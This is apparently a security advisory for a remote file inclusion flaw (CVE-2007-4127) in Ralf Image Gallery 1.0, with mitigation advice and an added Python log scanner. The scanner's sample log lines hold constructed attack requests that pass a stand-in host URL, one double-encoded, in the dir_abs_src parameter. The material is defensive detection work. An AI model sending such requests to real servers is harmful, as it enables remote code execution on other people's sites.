PT-2007-5329 · Rig · Ralf Image Gallery

Published: 2007-08-01 · Updated: 2024-08-07 · CVE-2007-4127

CVSS v2.0: 6.8 (Medium)
Vector: AV:N/AC:M/Au:N/C:P/I:P/A:P

Name of the Vulnerable Software and Affected Versions: Ralf Image Gallery (RIG) version 1.0

Description: A remote file inclusion issue exists, allowing remote attackers to execute arbitrary PHP code via a URL in the dir_abs_src parameter in the check_entry.php file. However, it is reported that the product exits if register_globals is enabled, potentially blocking exploitation.

Recommendations: For Ralf Image Gallery (RIG) version 1.0, consider disabling the check_entry.php file or restricting access to it until a fix is available. Additionally, ensure that register_globals is disabled to prevent potential exploitation.
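
A log check for the request pattern described above, as an added example that is not part of the original advisory or of RIG's code: it scans access-log lines for requests to check_entry.php whose dir_abs_src value is a URL rather than a local path. The function names, the /rig/ install path and the sample log lines are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# File and parameter named in the advisory.
SCRIPT = "check_entry.php"
PARAM = "dir_abs_src"

# Request line of a common/combined-format access log entry.
REQUEST = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[0-9.]+"')
# Two or more scheme characters before ':' (http:, ftp:, php:, data:), so a
# Windows drive letter such as C: is not reported.
SCHEME = re.compile(r"^\s*[a-z][a-z0-9+.\-]+:", re.IGNORECASE)

# Constructed sample log lines (documentation addresses and hosts).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Aug/2007:10:00:00 +0000] "GET /rig/index.php?album=1 HTTP/1.1" 200 512',
    '192.0.2.44 - - [01/Aug/2007:10:00:05 +0000] "GET /rig/check_entry.php?dir_abs_src=http%3A%2F%2Fhost.example%2Fx.txt HTTP/1.1" 200 0',
    '192.0.2.44 - - [01/Aug/2007:10:00:09 +0000] "GET /rig/check_entry.php?dir_abs_src=ftp%253A%252F%252Fhost.example%252Fx HTTP/1.0" 200 0',
    '192.0.2.10 - - [01/Aug/2007:10:00:12 +0000] "GET /rig/check_entry.php?dir_abs_src=/var/www/rig/src/ HTTP/1.1" 200 90',
]

def decode_fully(value, rounds=3):
    """Undo repeated percent-encoding (%253A -> %3A -> ':')."""
    for _ in range(rounds):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value

def suspicious_requests(lines):
    """Return (line_number, decoded_value) for each request that passes a URL in PARAM."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group("target"))
        if not unquote(url.path).lower().endswith("/" + SCRIPT):
            continue
        # parse_qsl decodes names and values once; decode_fully handles the rest.
        for name, value in parse_qsl(url.query, keep_blank_values=True):
            value = decode_fully(value)
            if name == PARAM and SCHEME.match(value):
                hits.append((number, value))
    return hits

if __name__ == "__main__":
    for number, value in suspicious_requests(SAMPLE_LOG):
        print(f"line {number}: {PARAM} carries a URL: {value}")
```

Access logs record only the query string, so this check covers GET requests; POST bodies need request-body logging.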

Exploit

Fix

Related Identifiers: CVE-2007-4127

Affected Products: Ralf Image Gallery